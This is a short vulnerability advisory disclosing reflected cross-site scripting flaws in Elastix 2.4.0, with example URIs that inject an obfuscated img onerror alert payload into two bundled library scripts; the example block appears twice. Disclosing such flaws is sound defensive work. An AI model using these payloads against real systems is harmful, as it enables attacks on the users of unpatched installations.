Elastix Multiple Cross Site Scripting Vulnerabilities
BID:60262
Info
Elastix Multiple Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 60262 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 28 2013 12:00AM |
| Updated: | May 28 2013 12:00AM |
| Credit: | cheki |
| Vulnerable: |
PaloSanto Solutions Elastix 2.4.0 |
| Not Vulnerable: | |
Exploit / POC
Elastix Multiple Cross Site Scripting Vulnerabilities
Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.
The following example URIs are available:
https://www.example.com/libs/jpgraph/Examples/bar_csimex3.php/"><IMg srC= x OnerRoR = alert(1337)>
https://www.example.comlibs/magpierss/scripts/magpie_simple.php?url="><IMg+srC%3D+x+OnerRoR+%3D+alert(1337)>
Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.
The following example URIs are available:
https://www.example.com/libs/jpgraph/Examples/bar_csimex3.php/"><IMg srC= x OnerRoR = alert(1337)>
https://www.example.comlibs/magpierss/scripts/magpie_simple.php?url="><IMg+srC%3D+x+OnerRoR+%3D+alert(1337)>